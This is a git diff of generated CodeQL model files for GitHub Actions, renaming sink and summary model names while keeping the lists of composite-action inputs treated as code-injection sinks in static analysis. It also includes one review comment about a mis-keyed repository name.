a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 9ddc6606a6d..35474e6c68f 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index cd04e9c8b34..ce961ee6a75 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index d986c331226..9ad4bb30666 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 9b30c6599c1..5fca46427e0 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 0089d9ca75d..9f0fecbe10b 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index d64d7c38a01..cadf01dbff1 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 55a87e2df67..ec4fc1da053 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 158aafbd115..e6530a19d97 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index ff12a54e97a..0bae4e91cde 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 1a92afe11a4..0acb53ba1d3 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 38f2399b368..f1b755e796b 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 36e983b8039..7d1733d647a 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 006a53e8376..4bf33c9a343 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 5410cb3ff30..9ca004a7c15 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 124b3cf2a5a..fc3870d89a8 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 8542583f3d9..1d621562771 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index e85e58fb40a..f09b364127e 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index d2005f3788a..56e7b814231 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 7340dfccdd0..9f953b32ab1 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 70022866bdd..257b77bc2c3 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index f7bd43cbc1e..49f2f86907f 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml 
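Review bot: In the `pyg-team_pytorch_geometric.model.yml` hunk both visible rows key on `pyg-team/pytorch/geometric`, while the file name points to the repository `pyg-team/pytorch_geometric`; it looks as if the generator turned every underscore of the file stem into a slash. With that key the `code-injection` sinks would presumably never match a `uses:` reference to the action, which is a silent false negative that this rename carries forward. The rows should read `["pyg-team/pytorch_geometric", "*", "input.torchvision-version", "code-injection", "generated"]` (likewise `input.cuda-version`), ideally by fixing the generator and regenerating. Other repositories with an underscore in their name are worth checking for the same problem; the rest of this hunk's rows lie outside the context shown.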
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index d85a35580b6..1e33c5e540a 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index ee0b51c72b4..cfbf15549c4 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 524a1f54ae4..24730af3d77 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] - ["quay/clair", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 310f11ed160..6be5abd09dd 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 441b824581c..145b6f0d0e3 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 19f9f7a03bb..c8b05bfd904 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 1ca71afacc7..04c218a76c1 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9f0ff2c86de..5447d4b7e2e 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index abb6c432aef..825ce27511d 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 6548880f59e..8f3e49c9768 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 5401d176051..1937367debc 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 70cf81f1b78..01b77b7ccc6 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index eccccba83fe..edbd28d401b 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index b7133aae304..4b31bd66c5a 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 26d7b448269..a186fa070b0 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 7600cd4bdde..92ee2971e3a 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index dd79b0845dd..07b8e96bfe2 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 71bdd001458..2a2a5baab45 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 3b3262f93a9..274fab01e92 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index b30d898dcc1..3671de9e58a 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 963518a3478..2ef34dac8ba 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 979a9aca5c2..d76f20031e7 100644 
--- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index b180a319baa..eccb5dae2bd 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index fb5fa4d8e4e..3cbd3330ccd 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index cb9faef2bf6..73c9c1f24a2 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index e7eb6b732ff..90c4f699308 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index a1b1a4b71e8..ed4e8820c99 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 2463b4a1d16..df51b9fe4c8 100644 
